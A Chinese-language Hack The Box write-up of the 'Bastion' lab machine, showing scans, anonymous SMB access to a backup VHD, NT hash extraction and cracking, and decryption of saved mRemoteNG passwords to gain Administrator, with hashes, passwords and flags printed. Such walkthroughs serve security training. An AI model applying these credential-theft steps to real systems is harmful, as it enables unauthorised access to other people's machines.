HTB：Bastion[WriteUP]

HTB：Bastion[WriteUP]

news2025/1/14 4:10:11

目录

连接至HTB服务器并启动靶机

信息收集

使用rustscan对靶机TCP端口进行开放扫描

将靶机TCP开放端口号提取并保存

使用nmap对靶机TCP开放端口进行脚本、服务扫描

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

使用nmap对靶机常用UDP端口进行开放扫描

使用enum4linux对靶机SMB共享进行枚举

使用smbclient连接靶机Backups共享

边界突破

在Windows资源管理器地址栏中输入：\\10.10.10.134\Backups访问共享

使用7z打开体积更大一些的.vhd文件

尝试寻找该虚拟机的SAM、SYSTEM文件

分别右键这两个文件，将其复制到本地

使用samdump2对配置文件中的哈希密码进行提取

将哈希值写入文件中以便爆破

使用john对该哈希值进行字典爆破

使用上述凭证登录靶机SSH服务

权限提升

使用smbmap通过上述凭证对靶机SMB共享再次枚举

查看靶机内存在的用户

查看当前用户信息

查看当前用户特权

列出靶机安装的软件

询问大模型该软件将用户敏感信息都存哪了

回到当前用户主目录

列出当前目录所有文件

再次询问大模型，confCons.xml通常用来存储什么信息

通过Linux命令将该目录及其文件路径进行转换

将confCons.xml文件下载到本地

我尝试在Github上查找该软件的哈希解密工具

编辑

将其下载后，我首先查看该脚本使用手册

使用该凭证登录到靶机SSH服务

连接至HTB服务器并启动靶机

靶机IP：10.10.10.134

分配IP：10.10.16.13

信息收集

使用rustscan对靶机TCP端口进行开放扫描

rustscan -a 10.10.10.134 -r 1-65535 --ulimit 5000 | tee res

将靶机TCP开放端口号提取并保存

ports=$(grep '^[0-9]' res | cut -d/ -f1 | paste -sd,)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep '^[0-9]' res | cut -d/ -f1 | paste -sd,
22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep '^[0-9]' res | cut -d/ -f1 | paste -sd,)

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670

使用nmap对靶机TCP开放端口进行脚本、服务扫描

nmap -sT -p$ports -sCV -Pn 10.10.10.134

需要重点关注的服务

22：SSH服务

445：SMB服务

5985：Win-RM服务

使用nmap对靶机TCP开放端口进行漏洞、系统扫描

nmap -sT -p$ports --script=vuln -O -Pn 10.10.10.134

使用nmap对靶机常用UDP端口进行开放扫描

nmap -sU --top-ports 20 -Pn 10.10.10.134

使用enum4linux对靶机SMB共享进行枚举

enum4linux -u 'root' -S 10.10.10.134

由枚举结果可见，靶机Backups共享允许访问

使用smbclient连接靶机Backups共享

smbclient -N \\\\10.10.10.134\\Backups

在主目录可见一个笔记文件note.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# smbclient -N \\\\10.10.10.134\\Backups
Try "help" to get a list of possible commands.
smb: \> ls
.                                   D        0 Tue Apr 16 06:02:11 2019
..                                  D        0 Tue Apr 16 06:02:11 2019
note.txt                           AR      116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp                         A        0 Fri Feb 22 07:43:08 2019
WindowsImageBackup                 Dn        0 Fri Feb 22 07:44:02 2019

                5638911 blocks of size 4096. 1177893 blocks available

将其下载并暂时退出SMB服务连接

smb: \> get note.txt
getting file \note.txt of size 116 as note.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit

查看该笔记内容

cat note.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

翻译：系统管理员：请不要在本地传输整个备份文件，VPN到子公司太慢了。

在\WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\目录下可见两个.vhd文件

在虚拟机技术中，.vhd（Virtual Hard Disk）是微软开发的一种虚拟硬盘文件格式，用于存储虚拟机的磁盘数据，像在 Hyper-V 等虚拟机环境中，它能完整模拟物理硬盘功能，保存操作系统、应用程序和用户数据。

边界突破

在Windows资源管理器地址栏中输入：\\10.10.10.134\Backups访问共享

使用7z打开体积更大一些的.vhd文件

尝试寻找该虚拟机的SAM、SYSTEM文件

SAM、SYSTEM默认存储路径：C:\Windows\System32\config

分别右键这两个文件，将其复制到本地

快捷键：对着文件右键后+按F5

使用samdump2对配置文件中的哈希密码进行提取

samdump2 SYSTEM SAM

提取出来的哈希值

*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

其中，Administrator、Guest都显示账户已停用，因此我们只需对L4mpje账户密码破解即可

将哈希值写入文件中以便爆破

echo 'L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::' > hash

使用john对该哈希值进行字典爆破

john hash --wordlist=../dictionary/rockyou.txt --format=nt

账户：L4mpje

密码：bureaulampje

使用上述凭证登录靶机SSH服务

ssh L4mpje@10.10.10.134

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje

l4mpje@BASTION C:\Users\L4mpje>

在C:\Users\L4mpje\Desktop目录下可找到user.txt文件

l4mpje@BASTION C:\Users\L4mpje\Desktop>dir

Volume in drive C has no label.

Volume Serial Number is 1B7D-E692

Directory of C:\Users\L4mpje\Desktop

22-02-2019 15:27    <DIR>          .
22-02-2019 15:27    <DIR>          ..
12-01-2025 08:10                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   4.824.010.752 bytes free

l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt

8e22e1e1e830fe4474ae632dc76a1e56

权限提升

使用smbmap通过上述凭证对靶机SMB共享再次枚举

smbmap -u L4mpje -p bureaulampje -H 10.10.10.134

由输出可见，跟一开始使用root账户及其空密码枚举出来的共享没任何区别

查看靶机内存在的用户

net user

查看当前用户信息

net user L4mpje

可见该用户不属于任何特权组

查看当前用户特权

whoami /priv

切换到powershell

列出靶机安装的软件

ls "C:\Program Files (x86)"

由输出可见，靶机安装了mRemoteNG，这是一款开源的终端管理工具类似tabby、windterm等，因此该软件的登录历史很可能记录着靶机管理员凭证

询问大模型该软件将用户敏感信息都存哪了

回到当前用户主目录

cd ~

列出当前目录所有文件

dir /a

由输出可见AppData目录，那就尝试直接进入%APPDATA%\mRemoteNG目录中

cd %APPDATA%\mRemoteNG

显然，该目录下以.xml结尾的文件及其备份都有可能存储着用户敏感信息

再次询问大模型，confCons.xml通常用来存储什么信息

存储用户认证？那就对了

通过Linux命令将该目录及其文件路径进行转换

echo -E 'L4mpje@10.10.10.134:C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml' | tr '\\' '/'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo -E 'L4mpje@10.10.10.134:C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml' | tr '\\' '/'
L4mpje@10.10.10.134:C:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml

将confCons.xml文件下载到本地

scp L4mpje@10.10.10.134:C:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .

查看该文件内容

cat confCons.xml

<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
    <Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>

对该文件内容简单查看可得Administrator用户密码哈希

aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==

这看起来不像任何我见过的密文

我尝试在Github上查找该软件的哈希解密工具

将其下载后，我首先查看该脚本使用手册

python mremoteng_decrypt.py -h

由输出可知，使用-s选项输入base64密文，尝试使用该工具进行密文破解

python mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# python mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
Password: thXLHM96BeKL0ER2

获得Administrator凭证

账户：Administrator

密码：thXLHM96BeKL0ER2

使用该凭证登录到靶机SSH服务

ssh Administrator@10.10.10.134

Microsoft Windows [Version 10.0.14393]

(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>whoami

bastion\administrator

在C:\Users\Administrator\Desktop目录下找到root.txt文件

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/2276278.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

HAMi + prometheus-k8s + grafana实现vgpu虚拟化监控

HAMi + prometheus-k8s + grafana实现vgpu虚拟化监控

最近长沙跑了半个多月，跟甲方客户对了下项目指标，许久没更新回来后继续研究如何实现 grafana实现HAMi vgpu虚拟化监控，毕竟合同里写了需要体现gpu资源限制和算力共享以及体现算力卡资源共享监控先说下为啥要用HAMi吧， 一个重要原…

阅读更多...

springboot使用Easy Excel导出列表数据为Excel

springboot使用Easy Excel导出列表数据为Excel

springboot使用Easy Excel导出列表数据为Excel Easy Excel官网：https://easyexcel.opensource.alibaba.com/docs/current/quickstart/write 主要记录一下引入时候的pom，直接引入会依赖冲突解决方法： &l…

阅读更多...

泛目录和泛站有什么差别

泛目录和泛站有什么差别

啥是 SEO 泛目录？ 咱先来说说 SEO 泛目录是啥。想象一下，你有一个巨大的图书馆，里面的书架上摆满了各种各样的书，每一本书都代表着一个网页。而 SEO 泛目录呢，就像是一个超级图书管理员，它的任务就是把这些…

阅读更多...

黑马天机学堂学习计划模块

黑马天机学堂学习计划模块

核心功能系统设计思路代码分析 1. 学习记录管理 • 存储学习记录到 Redis： 利用 Redis 缓存学习记录，减少频繁的数据库访问。 public void writeRecordCache(LearningRecord record) {String key String.format("LEARNING:R…

阅读更多...

初学stm32 --- DAC输出三角波和正弦波

初学stm32 --- DAC输出三角波和正弦波

输出三角波实验简要： 1，功能描述通过DAC1通道1(PA4)输出三角波，然后通过DS100示波器查看波形 2，关闭通道1触发(即自动) TEN1位置0 3，关闭输出缓冲 BOFF1位置1 4，使用12位右对齐模式将数字量写入DAC_…

阅读更多...

专题 - STM32

专题 - STM32

基础基础知识 STM所有产品线（列举型号）： STM产品的3内核架构（列举ARM芯片架构）： STM32的3开发方式： STM32的5开发工具和套件： 若要在电脑上直接硬件级调试STM32设备，则…

阅读更多...

25年无人机行业资讯 | 1.1 - 1.5

25年无人机行业资讯 | 1.1 - 1.5

25年无人机行业资讯 | 1.1 - 1.5 中央党报《经济日报》刊文：低空经济蓄势待发，高质量发展需的平衡三大关系据新华网消息，2025年1月3日，中央党报《经济日报》发表文章指出，随着国家发展改革委低空经济发展司的成立&a…

阅读更多...

时序数据库InfluxDB—介绍与性能测试

时序数据库InfluxDB—介绍与性能测试

目录一、简述二、主要特点三、基本概念 1、主要概念 2、保留策略 3、连续查询 4、存储引擎—TSM Tree 5、存储目录四、基本操作 1、Java-API操作五、项目中的应用六、单节点的硬件配置七、性能测试 1、测试环境 2、测试程序 3、写入测试 4、查询测试一…

阅读更多...

计算机网络（35）TCP报文段的首部格式

计算机网络（35）TCP报文段的首部格式

前言计算机网络中的TCP（传输控制协议）报文段的首部格式是TCP协议的核心组成部分，它包含了控制TCP连接的各种信息和参数。一、TCP报文段的结构 TCP报文段由首部和数据两部分组成。其中，首部包含了控制TCP连接的各种字段&#xff…

阅读更多...

GelSight Mini视触觉传感器凝胶触头升级:增加40%耐用性,拓展机器人与触觉AI 应用边界

GelSight Mini视触觉传感器凝胶触头升级:增加40%耐用性,拓展机器人与触觉AI 应用边界

马萨诸塞州沃尔瑟姆-2025年1月6日-触觉智能技术领军企业Gelsight宣布，旗下Gelsight Mini视触觉传感器迎来凝胶触头的更新。经内部测试，新Gel凝胶触头耐用性提升40%，外观与触感与原凝胶触头保持一致。此次升级有效满足了客户在机器人应用中对设…

阅读更多...

burpsiute的基础使用(2)

burpsiute的基础使用(2)

爆破模块（intruder）： csrf请求伪造访问（模拟攻击）: 方法一： 通过burp将修改，删除等行为的数据包压缩成一个可访问链接，通过本地浏览器访问（该浏览器用户处于登陆状态&a…

阅读更多...

【ASP.NET学习】ASP.NET MVC基本编程

【ASP.NET学习】ASP.NET MVC基本编程

文章目录 ASP.NET MVCMVC 编程模式ASP.NET MVC - Internet 应用程序创建MVC web应用程序应用程序信息应用程序文件配置文件用新建的ASP.NET MVC程序做一个简单计算器1. **修改视图文件**2. **修改控制器文件** 用新建的ASP.NET MVC程序做一个复杂计算器1.创建模型（…

阅读更多...

Git 命令代码管理详解

Git 命令代码管理详解

一、Git 初相识：版本控制的神器在当今的软件开发领域，版本控制如同基石般重要，而 Git 无疑是其中最耀眼的明珠。它由 Linus Torvalds 在 2005 年创造，最初是为了更好地管理 Linux 内核源代码。随着时间的推移，Git 凭借…

阅读更多...

OpenCV实现基于交叉双边滤波的红外可见光融合算法

OpenCV实现基于交叉双边滤波的红外可见光融合算法

1 算法原理 CBF是*Cross Bilateral Filter(交叉双边滤波)*的缩写，论文《IMAGE FUSION BASED ON PIXEL SIGNIFICANCE USING CROSS BILATERAL FILTER》。论文中，作者使用交叉双边滤波算法对原始图像 A A A， B B B 进行处理得到细节&#xff0…

阅读更多...

项目实战--网页五子棋（用户模块）(1)

项目实战--网页五子棋（用户模块）(1)

接下来我将使用Java语言，和Spring框架，实现一个简单的网页五子棋。主要功能包括用户登录注册，人机对战，在线匹配对局，房间邀请对局，积分排行版等。这篇文件讲解用户模块的后端代码 1. 用户表与实体类 …

阅读更多...

机器学习之随机森林算法实现和特征重要性排名可视化

机器学习之随机森林算法实现和特征重要性排名可视化

随机森林算法实现和特征重要性排名可视化目录随机森林算法实现和特征重要性排名可视化1 随机森林算法1.1 概念1.2 主要特点1.3 优缺点1.4 步骤1.5 函数及参数1.5.1 函数导入1.5.2 参数 1.6 特征重要性排名 2 实际代码测试 1 随机森林算法 1.1 概念是一种基于树模型的集成学…

阅读更多...

MySQL存储引擎、索引、索引失效

MySQL存储引擎、索引、索引失效

MySQL Docker 安装 MySQL8.0，安装见docker-compose.yaml 操作类型 SQL 程序语言有四种类型，对数据库的基本操作都属于这四种类，分为 DDL、DML、DQL、DCL DDL(Dara Definition Language 数据定义语言)，是负责数据结构定义与数据…

阅读更多...

WPF基础（1.1）：ComboBox的使用

WPF基础（1.1）：ComboBox的使用

本篇文章介绍ComboBox的基本使用。本篇文章的例子实现的功能：后端获取前端复选框中的选项之后，点击“确定”按钮，弹出一个MessageBox，显示用户选择的选项。文章目录 1. 效果展示2. 代码逻辑2.1 前端代码2.2 后端代码 1. 效果展…

阅读更多...

前端炫酷动画--文字(二)

前端炫酷动画--文字(二)

目录一、弧形边框选项卡二、零宽字符三、目录滚动时自动高亮四、高亮关键字五、文字描边六、按钮边框的旋转动画七、视频文字特效八、立体文字特效让文字立起来九、文字连续光影特效十、重复渐变的边框十一、磨砂玻璃效果十二、FLIP动画一、弧形边框…

阅读更多...

android 官网刷机和线刷

android 官网刷机和线刷

nexus、pixel可使用google官网线上刷机的方法。网址：https://flash.android.com/ 本文使用google线上刷机，将Android14 刷为Android12 以下是失败的线刷经历。准备工作下载升级包。https://developers.google.com/android/images?hlzh-cn 注意&…

阅读更多...

推荐文章

最新文章